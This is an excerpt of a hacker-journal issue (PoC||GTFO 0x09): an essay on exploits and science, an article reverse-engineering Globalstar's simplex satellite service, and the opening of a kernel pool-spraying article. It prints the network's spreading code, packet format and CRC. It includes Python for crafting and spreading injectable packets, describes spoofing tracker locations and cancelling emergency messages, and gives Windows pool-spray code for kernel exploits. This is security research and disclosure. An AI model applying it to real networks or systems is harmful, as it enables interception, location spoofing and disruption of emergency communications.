1 Please stand; now, please be seated.


Neighbors, please join me in reading this tenth 
release of the International Journal of Proof of Con- 
cept or Get the Fuck Out, a friendly little collection 
of articles for ladies and gentlemen of distinguished 
ability and taste in the field of software exploitation 
and the worship of weird machines. This is our tenth 
release, given on paper to the fine neighbors of Novi 
Sad, Serbia and Stockholm, Sweden. 

If you are missing the first nine issues, we the editors suggest pirating them from the usual locations, or on paper from a neighbor who picked up a copy of the first in Vegas, the second in São Paulo, the third in Hamburg, the fourth in Heidelberg, the fifth in Montréal, the sixth in Las Vegas, the seventh from his parents' inkjet printer during the Thanksgiving holiday, the eighth in Heidelberg, or the ninth in Montréal.

Page 4 contains our very own Pastor Manul 
Laphroaig's sermon on Newton and Turing, in which 
we learn about the academics' affection for Turing- 
completeness and why they should be allowed to 
marry it. 

On page 7, Colby Moore provides all the details 
you'll need to sniff simplex packets from the Glob- 
alstar satellite constellation. 

Page 12 introduces some tips by Peter Hlavaty of 
the Keen Team on kernel pool spraying in Windows 
and Linux. 

Page 19 presents the results of the second Under- 
handed Crypto Contest, held at the Crypto Village 
of Defcon 23. 
On page 21, Sophia D’Antoine introduces some
tricks for communicating between virtual machines 
co-located on the same physical host. In particular, 
the mfence instruction can be used to force strict or- 
dering, interfering with CPU instruction pipelining 
in another VM. 

Eric Davisson, on page 26, presents a nifty lit- 
tle trick for causing quarantined malware to be re- 
detected by McAfee Enterprise VirusScan! This par- 
ticular tumor is benign, but we bet a neighborly 
reader can write a malignant variant. 

Ron Fabela of Binary Brew Works, on page 28, 
presents his recipe for TCP/IPA, a neighborly beer 
with which to warm our hearts and our spirits dur- 
ing the coming apocalypse. 

Our centerfold in this issue is the schematic diagram to an Electronika BK 0010-01 computer from the USSR. You wouldn't believe how difficult it is to google the proper way to render a centerfold in LaTeX!

Vogelfrei shares with us some tricks for APRS 
and AX.25 networking on page 34. APRS exists 
around much of the western world, and all sorts of 
mischief can be had through it. (But please don't 
be a jerk.) 

Much as some readers think of us as a security magazine, we are first and foremost a systems-internals journal with a bias toward the strange and the classic designs. Page 40 contains a reprint, in the original Serbian, of Voja Antonić's article on the Galaksija, his Z80 home computer design, the very first in Yugoslavia.

Íbz is a damned fine neighbor of ours, both a mathematician and a musician. On page 60 you'll find her latest single, Root Rights are a Grrl's Best Friend! If you'd rather listen to it than just read the lyrics, run vlc pocorgtfo09.pdf and jump to page 61, where Philippe Teuwen describes how he made this fine document a polyglot of PDF, ZIP, and WavPack.

On page 62, you will find Oona's Puzzle Corner, 
with all sorts of nifty games for a child of five. If 
you aren't clever enough to solve them, then ask for 
help from a child of five! 

On page 64, the last and most important 
page, we pass around the collection plate. Pastor 
Laphroaig doesn't need a touring jumbo jet like 
those television and radio preachers; rather, this 
humble worshiper of the weird machines needs a 
Turing jumbo jet with which to storm Heaven! 





"Academics should just marry Turing Completeness already!" 


—the grugq 


2 From Newton to Turing, a Happy Family 


When engineers first gifted humanity with horse- 
less carriages that moved on rails under their own 
power, this invention, for all its usefulness, turned 
out to have a big problem: occasional humans and 
animals on the rails. This problem motivated many 
inventors to look for solutions that would be both 
usable and effective. 
Unfortunately, none worked. The reason for this is not so easy to explain—at least Aristotelian physics had no explanation, and few scientists till Galileo's time were interested in one. On the one hand, motion had to be brought on by some force and tended to kinda barrel about once it got going; on the other hand, it also tended to dissipate eventually. It took about 500 years from doubting the Aristotelian idea that motion ceased as soon as its impelling force ceased to the first clear pronouncement that motion in absence of external forces was a persistent rather than a temporary virtue; and another 600 for the first correct formulation of exactly what quantities of motion were conserved. Even so, it took another century before the mechanical conservation laws and the actual names and formulas for momentum and energy were written down as we know them.
These days, “conservation of energy” is supposed to be one of those word combinations to check off on multiple-choice tests that make one eligible for college.¹ Yet we should remember that the steam engine was invented well before these laws of classical mechanics were made comprehensible or even understood at all. Moreover, it took some further 40–90 years after Watt's ten-horsepower steam engine patent² to formulate the principles of thermodynamics that actually make a steam engine work—by which time it was chugging along at 10,000 horsepower, able to move not just massive amounts of machinery but even the engine's own weight along the rails, plus a lot more.

All of this is to say that if you hear scientists doubting how an engineer can accomplish things without their collective guidance, they have a lot of history to catch up with, starting with that thing called the Industrial Revolution. On the other hand, if you see engineers trying to build a thing that just doesn't seem to work, you just might be able to point them to some formulas that suggest their energies are best applied elsewhere. Distinguishing between these two situations is known as magic, wisdom, extreme luck, or divine revelation; whoever claims to be able to do so unerringly is at best a priest,³ not a scientist.

















¹ Whether one actually understands them or not—and, if you value your sanity, do not try to find out if your physics teachers actually understand them either. You have been warned.

² Not that stationary steam engines were weaklings either: driving ironworks and mining pumps takes a lot of horses.

³ Typically, of a religion that involves central planning and state-run science. This time they'll get it right, never fear!


There is an old joke that whatever activity needs 
to add “science” to its name is not too sure it is one. 
Some computer scientists may not take too kindly 
to this joke, and point out that it's actually the 
word “computer” that’s misleading, as their science 
transcends particular silicon-and-copper designs. It 
is undeniable, though, that hacking as we know it 
would not exist without actual physical computers. 


As scientists, we like exhaustive arguments: either by full search of all finite combinatorial possibilities or by tricks such as induction that look convincing enough as a means of exhausting infinite combinations. We value above all being able to say that a condition never takes place, or always holds. We dislike the possibility that there can be a situation or a solution we can overlook but someone may find through luck or cleverness; we want a yes to be a yes and a no to mean no way in Hell. But either full search or induction only apply in the world of ideal models—call them combinatorial, logical, or mathematical—that exclude any kinds of unknown unknowns.


Hence we have many models of computation: 
substituting strings into other strings (Markov algo- 
rithms), rewriting formulas (lambda calculus), au- 
tomata with finite and infinite numbers of states, 
and so on. The point is always to enumerate all fi- 
nite possibilities or to convince ourselves that even 
an infinite number of them does not harbor the ones 
we wish to avoid. The idea is roughly the same as 
using algebra: we use formulas we trust to reason 
about any and all possible values at once, but to do 
so we must reduce reality to a set of formulas. These 
formulas come from a process that must prod and 
probe reality; we have no way of coming up with 
them without prodding, probing, and otherwise ex- 
perimenting by hunch and blind groping—that is, by 
building things before we fully understand how they 
work. Without these, there can be no formulas, or 
they won't be meaningful. 

So here we go. Exploits establish the variable space; “science” searches it, to our satisfaction or otherwise, or—importantly, to save us effort—asserts that a full and exhaustive search is infeasible. This may be the case of energy conservation vs. trying to construct a safer fender—or, perhaps, the case of us still trying to formulate what makes sense to attempt.


That which we call the “arms race" is a part of 
this process. With it, we continually update the 
variable spaces that we wish to exhaust; without it, 
none of our methods and formulas mean much. This 
brings us to the recent argument about exploits and 
Turing completeness. 


[Illustration, captioned “Fender proposed by the …”; the remainder of the caption is not legible.]
Knowledge is power.⁴ In case of the steam engine, the power emerged before the kind of knowledge called “scientific” (if one is in college) or “basic” (if one is a politician looking to hitch a ride—because actual science has a tradition of overturning its own “basics” as taught in schools for at least decades if not centuries). In any case, the knowledge of how to build these engines was there before the knowledge that actually explained how they worked, and would hardly have emerged if these things had not been built already.
⁴ The question of whether that which is not power is still knowledge is best left to philosophers. One can blame Nasir al-Din al-Tusi for explaining the value of Astrology to Khan Hulagu by dumping a cauldron down the side of a mountain to wake up the Khan's troops and then explaining that those who knew the causes above remained calm while those who didn't whirled in confusion below—but one can hardly deny that being able to convince a Khan was, in fact, power. Not to mention his horde. Because a Khan, by definition, has a very convincing comeback for “Yeah? You and what horde?”


Our very own situation, neighbors, is not unlike 
that of the steam power before the laws of ther- 
modynamics. There are things that work (pump 
mines, drive factories), and there are official ways of 
explaining them that don't quite work. Eventually, 
they will merge, and the explanations will catch up, 
and will then become useful for making things that 
work better—but they haven't quite yet, and it is 
frustrating. 
This frustration is understandable. As soon as academics rediscovered a truly nifty kind of exploit programming, they not only focused on the least practically relevant aspect of it (Turing completeness), but did so to the exclusion of all other kinds of niftiness such as information leaks, probabilistic programming (heap feng-shui and spraying), parallelism (cloning and pinning of threads to sap randomization), and so on. That focus on the irrelevant to the detriment of the relevant has really rankled. It was hard to miss where the next frontier of exploitation's hard programming tasks and its next set of challenges lay, but oh boy, did academia do it again.

Yet it is also clear why they did it. Academic 
CS operates by models and exhaustive searches or 
reasoning. Its primary method and deliverable is 
exhaustive analysis of models, i.e., the promise that 
certain bad things never happen, that all possible 
trajectories of a system have been or can be enu- 
merated. 

Academia first saw exploit programming when it was presented to it in the form of a model; prior to that, their eyes would just slide off it, because it looked “ad-hoc”, and one can neither reason about “ad-hoc” nor enumerate it (at least, if one wants to meet publication goals). When it turned out it had a model, academia did with it what it normally does with models: automating, tweaking, searching, finding their theoretical limits, and relating them to other models, one paper at a time.⁵

This is not a bad method; at least, it gave us complex compilers and CPUs that don't crumble under the weight of their bugs.⁶ Eventually we will want the kind of assurances this method creates—when their models of unexpected execution are complete enough and close enough to reality. For now, they are not, and we have to go on building our engines without guidance from models, but rather to make sure new models will come from them.

Not that we are without hope. One only has 
to look to Grsecurity/PaX at any given time to 
see what will eventually become the precise stuff of 
Newton's laws for the better OS kernels; similarly, 
the inescapable failure modes of data and program- 
ming complexity will eventually be understood as 
clearly as the three principles of thermodynamics. 
Until then our best bet is to build engines—however 
unscientific—and to construct theories—however re- 
moved from real power—and to hope that the en- 
gineering and the science will take enough notice of 
each other to converge within a lifetime, as they have 
had the sense to do during the so-called Industrial 
Revolution, and a few lucky times since. 

And to this, neighbors, the Pastor raises not one 
but two drinks—one for the engineering orienting the 
science, and one for the science catching up with the 
knowledge that is power, and saving it the effort of 
what cannot be done—and may they ever converge! 
Amen. 








⁵ And some of these papers were true Phrack-like gems that, true to the old-timey tradition, explained and exposed surprising depths of common mechanisms: see, for example, SROP and COOP.

⁶ While, for example, products of the modern web development “revolution” already do, despite being much less complex than a CPU.


3 Breaking Globalstar Satellite Communications 


by Colby Moore 


It might be an understatement to say that hackers have a fascination with satellites. Fortunately, with 
advancements in Software Defined Radio such as the Ettus Research USRP and Michael Ossmann’s HackRF, 
satellite hacking is now not only feasible, but affordable. Here we'll discuss the reverse engineering of 
Globalstar's Simplex Data Service, allowing for interception of communications and injection of data back 
into the network. 

Rumor has it that after deployment, Globalstar's first generation of satellites began to fail, possibly due to poor radiation hardening. This affected the return path data link, where Globalstar would transmit to a user. To salvage the damaged satellite network, Globalstar introduced a line of simplex products that enable short, one-way communication from the user to Globalstar.

The nature of the service makes it ideal for asset tracking and remote sensor monitoring. While extremely 
popular with oil and gas, military, and shipping industries, this technology is also widely used by consumers. 
A company called SPOT produces consumer-grade asset trackers and personal locator beacons that utilize 
this same technology. 

Globalstar touts their simplex service as “extremely difficult” to intercept, noting that the signal's “Low-Probability-of-Intercept (LPI) and Low-Probability-of-Detection (LPD) provide over-the-air security.”⁷

In this article I'll outline the basics for reverse engineering the Globalstar Simplex Data Service's modulation scheme and protocol, and will provide the technical information necessary to interface with the network.











3.1 Network Architecture


The network is comprised of many Low Earth Orbit, bent-pipe satellites. Data is transmitted from the user 
to the satellite on an uplink frequency and repeated back to Earth on a downlink frequency. Globalstar 
ground stations all over the world listen for this downlink data, interpret it, and expose it to the user via an 
Internet-facing back-end. Each ground station provides a several thousand mile window of data coverage. 

Bent-pipe satellites are “dumb” in that they do not modify the transmitted data. This means that the 
data on the uplink is the same on the downlink. Thus, with the right knowledge, a skilled adversary can 
intercept data on either link. 


3.2 Tools and Code 


This research was conducted using GNURadio and Python for data processing and an Ettus Research B200 for RF work. Custom proof-of-concept toolsets were written for DSSS and packet decoding. Devices tested include a SPOT Generation 3, a SPOT Trace, and a SmartOne A.





3.3  Frequencies and Antennas 


Four frequencies, spaced 2.5 MHz apart, are allocated for the simplex data uplink. Current testing has only shown operation on channel A.

    Channel   Frequency
    A         1611.25 MHz
    B         1613.75 MHz
    C         1616.25 MHz
    D         1618.75 MHz


⁷ http://productsupport.globalstar.com/2009/02/09/are-simplex-messages-secure/


[Figure: GNU Radio Companion flowgraph used to demodulate a captured IQ recording as plain BPSK. File Source (file …re-4M-428pm-trace.iq, sample rate 5M, no repeat) → Throttle → Rational Resampler (interpolation 5, decimation 4) → Simple Squelch (threshold −60 dB, alpha 1) → Costas Loop (order 2, loop bandwidth 62.8m) → PSK Demod (2 constellation points, no differential encoding, 4 samples/symbol, excess BW 350m, frequency/timing/phase BW 62.8m, no Gray code) → Char To Float (scale 1) → File Sink (file …ted spread out.bytes, overwrite, unbuffered off). WX GUI FFT Sink (FFT size 1024, 10 dB per division, refresh rate 15), Waterfall Sink (FFT size 512, dynamic range 100, FFT rate 15) and two Scope Sinks (XY mode on, auto trigger, Y axis “Counts”), all at 5M sample rate, are attached for monitoring.]


Globalstar uses left-hand circular-polarized antennas for transmission of simplex data from the user to 
the satellite. The Globalstar GSP-1620 antenna, designed for transmitting from the user to a satellite, has 
proven adequate for experimentation. 

Downlink is a bit more complicated, and far more faint. Channels vary by satellite, but are within the 
6875—7055 MHz range. Both RHCP and LHCP are used for downlink. 


3.4 Direct Sequence Spread Spectrum 


Devices using the simplex data service implement direct sequence spread spectrum (DSSS) modulation to 
reliably transmit data using low power. DSSS is a modulation scheme that works by mixing a slow data signal 
with a very fast Pseudo Noise (PN) sequence. Since the pseudo-random sequence is known, the resulting 
signal retains all of the original data information but spread over a much wider spectrum. Among other 
benefits, this process makes the signal more tolerant to interference. 

In Globalstar's implementation of DSSS, packet data is first modulated as non-differential BPSK at 
100.04 bits/second, then spread using a repeating 255 chip PN sequence at a rate of 1,250,000 chips/second. 
Here “chip” refers to one bit of a PN sequence, so that it is not confused with actual data bits. 








3.5 Pseudo Noise Sequence / M-Sequences 


Pseudo Noise (PN) sequences are periodic binary sequences known by both the transmitter and receiver. 
Without this sequence, data cannot be received. The simplex data service uses a specific type of PN sequence 
called an M-Sequence. 

M-Sequences have the unique property of having a strong autocorrelation for phase shifts of zero but very poor correlation for any other phase shift. This makes the detection of the PN in unknown data, and subsequently locking on to a DSSS signal, relatively simple.

All simplex data network devices examined use the same PN sequence to transmit data. By knowing one code, all network data can be intercepted.


3.6 Obtaining The M-Sequence 





In order to intercept network data, the PN sequence must be recovered. For each bit of data transmitted, the PN sequence repeats 49 times. Data packets contain 144 bits.

$$\frac{1{,}250{,}000\ \text{chips}}{1\ \text{second}} \times \frac{1\ \text{second}}{100.04\ \text{bits}} \times \frac{1\ \text{PN sequence}}{255\ \text{chips}} = 49\ \text{PN sequences/bit}$$

The PN sequence never crosses a bit boundary, so each data bit is spread by 49 whole repetitions of the PN, and within any one bit the transmitted chips are either the PN itself or its bitwise complement. It can therefore be inferred that, for a 0 data bit,

    xor(PN, data) == PN

while a 1 data bit yields the complement of PN; either way the PN can be read straight off the chip stream.


By decoding the transmitted data stream as BPSK,⁸ we can demodulate a spread bitstream. Note that demodulation in this manner negates any processing gain provided by DSSS and thus can only be received over short distances, so for long distances you will need to use a proper DSSS implementation.

Viewing the demodulated bitstream, a repeating sequence is observed. This is the PN, the spreading code key to the kingdom.

The simplex data network PN code (255 chips) is
111111110010110101101110101010111001001101101001100110100011101101100010001001111010010010000111100010100111000111110101111001110100001010110010100010110000011001000110000110111111011100001000001001010100101111100000011100110001101010000000101110111101100





3.7  Despreading 


DSSS theory states that to decode a DSSS-modulated signal, a received signal must be mixed once again with the modulating PN sequence; the original data signal will then fall out. However, for this to work, the PN sequence needs to be phase-aligned with the mixed PN/data signal, otherwise only noise will emerge.

Alignment of the PN sequence to the data stream is accomplished by correlating the PN sequence against the incoming datastream at each sample. When aligned, the correlation will peak. To despread, this correlation peak is tracked and the PN is mixed with the sampled RF data. The resulting signal is the 100.04 bit/second non-differential BPSK modulated packet data.





3.8 Decoding and Locations 


Once the signal is despread, a BPSK demodulator is used to recover data. The result is a binary stream, 144 bits in length, representing one data packet. The data packet format is as follows:

    Field          Bits   Description
    Preamble       10     0000001011 signifies start of packet
    ESN            26     3 bits for manufacturer ID and 23 bits for unit ID
    Message #      4      message number modulo 16, saved in non-volatile memory
    Packet #       4      number of packets in a message
    Packet Seq. #  4      sequence number for each packet in a message
    User Data      72     9 bytes of user information, MSB first
    CRC24          24     CRC is 24 bits with polynomial 114377431 (octal, as in the code below; 0x131FF19)


Simplex data packets can technically transmit any 72 bits of user defined data. However, the network is predominantly used for asset tracking and thus many packets contain GPS coordinates being relayed from tracking devices. This data scheme for GPS coordinates can be interpreted with the following Python code, where user_data is the 72-bit field as a string of '0'/'1' characters (the floating-point constants keep Python 2 from truncating the result to whole degrees):

    latitude = int(user_data[8:32], 2) * 90.0 / 2**23
    longitude = 360 - int(user_data[32:56], 2) * 180.0 / 2**23


⁸ DSSS theory shows us that DSSS is the same as BPSK for a BPSK data signal.


3.9 CRC 


Packets are verified using a 24 bit CRC. The data packet minus the preamble and CRC are fed into the CRC algorithm in order to verify or generate a CRC. The following Python code implements the CRC algorithm; TX_Data is the 144-bit packet as a string of '0'/'1' characters.

    import sys

    def crcTwentyfour(TX_Data):
        TempCRC = 0
        Crc = 0xFFFFFF

        for k in range(0, 14):  # calc checksum on 14 bytes starting with ESN
            # offset to skip part of the preamble (dictated by algorithm)
            TempCRC = int(TX_Data[(k*8)+8 : (k*8)+8+8], 2)

            if 0 == k:
                # skip 2 preamble bits in byte0
                TempCRC = TempCRC & 0x3f

            Crc = Crc ^ (TempCRC << 16)
            for m in range(0, 8):
                Crc = Crc << 1
                if Crc & 0x1000000:
                    # seed CRC (polynomial written in octal)
                    Crc = Crc ^ 0o114377431

            Crc = Crc & 0xffffff
        # end crc generation. lowest 24 bits of the long hold the CRC

        # first CRC byte to TX_Data
        byte14 = (Crc & 0x00ff0000) >> 16
        # second CRC byte to TX_Data
        byte15 = (Crc & 0x0000ff00) >> 8
        # third CRC byte to TX_Data
        byte16 = (Crc & 0x000000ff)

        final_crc = (byte14 << 16) | (byte15 << 8) | byte16
        if final_crc != int(TX_Data[120:144], 2):
            print("Error: CRC failed")
            sys.exit(0)
        return final_crc





3.10 Transmitting 


DISCLAIMER: It is most likely illegal to transmit on Globalstar’s frequencies where you live. Do so at your 
own risk. Remember, no one likes late night visits from the FCC and it would really suck if you interrupted 
someone’s emergency communication! 

By knowing the secret PN code, modulation parameters, data format, and CRC, it is possible to craft 
custom data packets and inject them back into the satellite network. The process is as follows: 





• Generate a custom packet
• Calculate and affix the packet's CRC
• Spread the packet using the Globalstar PN sequence
• BPSK modulate the spread data and transmit on the RF carrier


Various SDR boards should have enough power to communicate with the network; however, COTS amplifiers are available for less than a few hundred dollars. Specifications suggest a transmit power of about 200 milliwatts.
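The whole chain of sections 3.6 through 3.10 at the bit level, as an added example that is not Colby Moore's code: a packet is built with the field layout and CRC given above, spread with the 255-chip PN, and then recovered from a hard-decided chip stream that starts at an arbitrary offset and carries chip errors, by PN correlation, bit-boundary search and preamble search, before being parsed and CRC-checked. Assumptions that are not in the article: the GPS encoder is simply the inverse of the decode formulas above, user-data bytes 0, 7 and 8 are left zero, and the channel is modelled as random chip flips on already-demodulated chips rather than as RF noise. The sample packet and the error rate are constructed for the demonstration.

```python
import random

PN = ("1111111100101101011011101010101110010011011010011001101"
      "00011101101100010001001111010010010000111100010100111000111110101111001110100001010110010"
      "10001011000001100100011000011011111101110000100000100101010010111110000001110011000110101"
      "0000000101110111101100")              # the four printed lines of the article's M-sequence
PN_INT = int(PN, 2)
PN_INV = PN.translate(str.maketrans("01", "10"))
PERIODS_PER_BIT = 49                       # 1,250,000 chips/s / 100.04 bits/s / 255 chips
PREAMBLE = "0000001011"
CRC_POLY = 0o114377431                     # octal, as in the article's CRC routine (0x131FF19)


def crc24(bits):
    """The article's CRC-24: 14 bytes from bit 8 on, the two preamble bits in the first masked."""
    crc = 0xFFFFFF
    for k in range(14):
        byte = int(bits[8 + 8 * k:16 + 8 * k], 2) & (0x3F if k == 0 else 0xFF)
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= CRC_POLY
        crc &= 0xFFFFFF
    return crc


def encode_gps(lat, lon):
    """Assumed inverse of the article's decode (lat = raw*90/2**23, lon = 360 - raw*180/2**23)."""
    return f"{round(lat * 2**23 / 90):024b}{round((360 - lon) * 2**23 / 180):024b}"


def decode_gps(user_data):
    return (int(user_data[8:32], 2) * 90 / 2**23, 360 - int(user_data[32:56], 2) * 180 / 2**23)


def build_packet(esn, msg_no, n_packets, seq, lat, lon):
    """Preamble, ESN, message #, packet #, packet seq #, 72 bits of user data, CRC24: 144 bits."""
    user_data = "0" * 8 + encode_gps(lat, lon) + "0" * 16      # bytes 0, 7, 8 assumed opaque
    bits = PREAMBLE + f"{esn:026b}{msg_no:04b}{n_packets:04b}{seq:04b}" + user_data
    return bits + f"{crc24(bits):024b}"


def parse_packet(bits):
    """Field dictionary for a 144-bit packet, or None if the preamble or the CRC fails."""
    if len(bits) != 144 or not bits.startswith(PREAMBLE) or int(bits[120:], 2) != crc24(bits):
        return None
    esn = int(bits[10:36], 2)
    return {"mfr_id": esn >> 23, "unit_id": esn & 0x7FFFFF, "msg_no": int(bits[36:40], 2),
            "n_packets": int(bits[40:44], 2), "seq": int(bits[44:48], 2),
            "gps": decode_gps(bits[48:120])}


def spread(bits):
    """DSSS: each data bit becomes 49 PN periods; a 1 bit sends the complemented PN (xor)."""
    return "".join((PN_INV if b == "1" else PN) * PERIODS_PER_BIT for b in bits)


def period_correlation(rx, off):
    """Correlation of one 255-chip window with the PN: about +255 (bit 0) or -255 (bit 1)
    when aligned, near zero at any other phase (M-sequence property)."""
    return 255 - 2 * bin(int(rx[off:off + 255], 2) ^ PN_INT).count("1")


def despread(rx, probe_periods=16):
    """Recover packet bits from a hard-decided chip string of unknown PN phase and bit alignment."""
    # 1. PN phase: the chip lag whose first few periods correlate most strongly.
    lag = max(range(255), key=lambda g: sum(abs(period_correlation(rx, g + 255 * j))
                                            for j in range(probe_periods)))
    # 2. One hard decision per PN period.
    n = (len(rx) - lag) // 255
    pbits = [1 if period_correlation(rx, lag + 255 * j) < 0 else 0 for j in range(n)]

    # 3. Bit alignment: the 49-period grouping whose groups are most unanimous; majority vote.
    def votes(phase):
        return [sum(pbits[s:s + PERIODS_PER_BIT]) / PERIODS_PER_BIT
                for s in range(phase, n - PERIODS_PER_BIT + 1, PERIODS_PER_BIT)]

    phase = max(range(PERIODS_PER_BIT), key=lambda p: sum(abs(v - 0.5) for v in votes(p)))
    bits = "".join("1" if v > 0.5 else "0" for v in votes(phase))
    # 4. Cut one packet at the first preamble.
    i = bits.find(PREAMBLE)
    return bits[i:i + 144] if i >= 0 else None


def demo(seed=1, chip_error_rate=0.1):
    """Constructed round trip: random chips, the spread packet at an odd offset, random chips."""
    rng = random.Random(seed)
    tx = build_packet(esn=(5 << 23) | 0x1ABCDE, msg_no=3, n_packets=1, seq=0, lat=45.25, lon=19.85)
    noisy = "".join(c if rng.random() >= chip_error_rate else "10"[int(c)] for c in spread(tx))

    def junk(k):
        return "".join(rng.choice("01") for _ in range(k))

    rx_bits = despread(junk(1000) + noisy + junk(600))
    return tx, rx_bits, parse_packet(rx_bits)


if __name__ == "__main__":
    tx, rx_bits, pkt = demo()
    print("recovered" if rx_bits == tx else "mismatch", pkt)
```

Two things worth noticing when running it: the lag search only needs a handful of periods because a misaligned M-sequence correlates to almost nothing, and the majority vote over 49 periods means a few wrong period decisions never reach the packet, which is the processing gain the plain-BPSK shortcut of section 3.6 gives up.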


3.11 Spoofing 


SPOT produces a series of asset trackers called SPOT Trace. SPOT also provides SPOT Device Updater.pkg, an OS X update utility, to configure various device settings. This utility contains development code that is never called by the consumer application.

The updater app package contains SPOT3FirmwareTool.jar. Decompilation shows that a UI view calls a method writeESN() in SPOTDevice.class. You read that correctly, they included the functionality to program arbitrary serial numbers to SPOT devices!

This UI can be called with a simple Java utility.


    import com.globalstar.SPOT3FirmwareTool.UI.DebugConsole;

    public class SpotDebugConsole {
        public static void main(String[] args) {
            DebugConsole.main(args);
        }
    }





Upon execution, a debug console is launched, allowing the writing of arbitrary settings, including ESNs, to the SPOT device. (This functionality was included in Spot Device Updater 1.4 but has since been removed.)





3.12 Impact 


The simplex data network is implemented in countless places worldwide. Everything from SCADA monitor- 
ing to emergency communications relies on this network. To find that there is no encryption or authentication 
on the services examined is sad. And to see that injection back into the network is possible is even worse. 

Using the specifications outlined here, it is possible—among other things—to intercept communications 
and track assets over time, spoof an asset's location, or even cancel emergency help messages from personal 
locator beacons. 

One could also enhance their own service, create their own simplex data network device, or use the 
network to transmit their own covert communications. 





3.13 PoC and Resources 


This work was presented at BlackHat USA 2015 and proof-of-concept code is available both on GitHub and within this PDF file.⁹

⁹ git clone https://github.com/synack/globalstar
  unzip pocorgtfo09.pdf globalstar.tar.bz2
4 Unprivileged Data All Around the Kernels; or, Pool Spray the Feature!


by Peter Hlavaty of Keen Team 


When it comes to kernel exploitation, you might think about successful exploitation of interesting bug classes such as use-after-free and over/under-flows. In such exploitation it is sometimes really useful to ensure that the corrupted pointer will still point to accessible, and in the best scenario also controllable, data.

As we described in our recent blogpost¹⁰ about kernel security, although controlling kernel data to such an extent should be impossible and unimaginable, this is, in fact, not the case with current OS kernels.

In this article we describe layout and control of pool data for various kernels, in different scenarios, and with some nifty examples.


4.1 Windows 


1. Small and big allocations: There are a number of known approaches to invoking ExAllocatePool (kmalloc) in kernel, with more or less control over data shipped to kernel. Two notable examples are SetClassLongPtrW¹¹ by Tarjei Mandt and CreateRoundRectRgn/PolyDraw¹² by Tavis Ormandy. Another option we were working on recently resides in SessionSpace and grants full control of each byte except those in the header space. We successfully leveraged this approach in Pwn2Own 2015 and described it this year at Recon.¹³

We use the win32k!_gre_bitmap object.





The CreateBitmap function creates a bitmap with the specified width, height, and color format (color planes and bits-per-pixel).

Syntax (C++):

    HBITMAP CreateBitmap(
      _In_ int        nWidth,
      _In_ int        nHeight,
      _In_ UINT       cPlanes,
      _In_ UINT       cBitsPerPel,
      _In_ const VOID *lpvBits
    );


You can think of it as a kind of kmalloc. Consider the following code: 





    class CBitmapBufObj
        : public IPoolBuf
    {
        gdi_obj<HBITMAP> m_bitmap;
    public:
        size_t Alloc(void* mem, size_t size) override {
            m_bitmap.reset(CreateBitmap(
                size, 1, 1,
                RGB * 8,          // cBitsPerPel, as printed in the original listing ("RGB x 8")
                nullptr));
            if (!m_bitmap.get())
                return 0;
            // the pixel buffer now lives in session pool; fill it with our bytes
            return SetBitmapBits(m_bitmap, size, mem);
        }

        void Free() override {
            m_bitmap.reset();
        }
    };

¹⁰ http://www.k33nteam.org/noks.html
¹¹ http://j00ru.vexillium.org/dump/recon2015.pdf
¹² http://blog.cmpxchg8b.com/2013/05/introduction-to-windows-kernel-security.html
   http://www.slideshare.net/PeterHlavaty/power-of-linked-list
¹³ This Time Font Hunt You Down in 4 Bytes, Peter Hlavaty and Jihui Lu, Recon 2015





2. Different pools matter: On Windows, exploitation of different objects can get a bit tricky, because they can reside in different pools.


    typedef enum _POOL_TYPE {
        NonPagedPool,
        NonPagedPoolExecute                  = NonPagedPool,
        PagedPool,
        NonPagedPoolMustSucceed              = NonPagedPool + 2,
        DontUseThisType,
        NonPagedPoolCacheAligned             = NonPagedPool + 4,
        PagedPoolCacheAligned,
        NonPagedPoolCacheAlignedMustS        = NonPagedPool + 6,
        MaxPoolType,

        NonPagedPoolBase                     = 0,
        NonPagedPoolBaseMustSucceed          = NonPagedPoolBase + 2,
        NonPagedPoolBaseCacheAligned         = NonPagedPoolBase + 4,
        NonPagedPoolBaseCacheAlignedMustS    = NonPagedPoolBase + 6,

        NonPagedPoolSession                  = 32,
        PagedPoolSession                     = NonPagedPoolSession + 1,
        NonPagedPoolMustSucceedSession       = PagedPoolSession + 1,
        DontUseThisTypeSession               = NonPagedPoolMustSucceedSession + 1,
        NonPagedPoolCacheAlignedSession      = DontUseThisTypeSession + 1,
        PagedPoolCacheAlignedSession         = NonPagedPoolCacheAlignedSession + 1,
        NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,

        NonPagedPoolNx                       = 512,
        NonPagedPoolNxCacheAligned           = NonPagedPoolNx + 4,
        NonPagedPoolSessionNx                = NonPagedPoolNx + 32
    } POOL_TYPE;


This means that if you want to use our win32k!_gre_bitmap technique, you must use it only on objects existing in SessionPool, which is not always the case. But on the other hand, as we already discussed, in different pools you can find different objects to fulfill your needs. Another nice example, in a different pool, was leveraged by Alex Ionescu,¹⁴ using the Pipe object (and proposed with the socket object as well):


CreatePipe function 


Creates an anonymous pipe, and returns handles to the read and write ends of the pipe. 


Syntax 


| С++ 


BOOL WINAPI CreatePipe( 


Dub. PHANDLE 
_Out_ PHANDLE 


hReadPipe, 
hWritePipe, 


In opt LPSECURITY ATTRIBUTES lpPipeAttributes, 


Tn DWORD 
); 





nSize 


The following piece of code represents another kmalloc of chosen size. 





class CPipeBufObj :
    public IPoolBuf
{
    CPipe m_pipe;
public:
    size_t Alloc(void* mem, size_t size) override {
        DWORD n_written = 0;   // WriteFile wants an LPDWORD, not a size_t*
        auto status = WriteFile(
            m_pipe.In(),
            mem, size,
            &n_written, nullptr);
        // WriteFile returns a BOOL; NT_SUCCESS() on a BOOL is always true,
        // so test the BOOL itself.
        if (!status)
            return 0;
        return n_written;
    }

    void Free() override {
        m_pipe.reset(new CPipe);
    }
};

14 Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids' Pool, Alex Ionescu, Dec 2014
This was just a sneak peek at two objects that are easy to misuse for precise control over kernel memory
content (via SetBitmapBits and WriteFile) and the pool layout (via Alloc and Free). Precise pool layout
control can be achieved mainly in big pools, where layout can be controlled to a large extent. With small
allocations, you may face more problems due to randomization being in place, as covered by the nifty research
[10] of Tarjei Mandt and Chris Valasek.

We mention only a few objects to spray with; however, if you invest a bit of time to look around the 
kernel, you will find other mighty objects in different pools as well. 


4.2 Linux (Android) Kernel 


In Linux, you face a different scenario. With SLUB, you encounter problems due to overall randomiza- 
tion, and due to data that is not so easily controllable. In addition, SLUB has a different concept of 
pool separation—that of separate kernel caches for specific object types. Kernel caches provide far better 
granularity, as often only a few objects are stored in the same cache. 

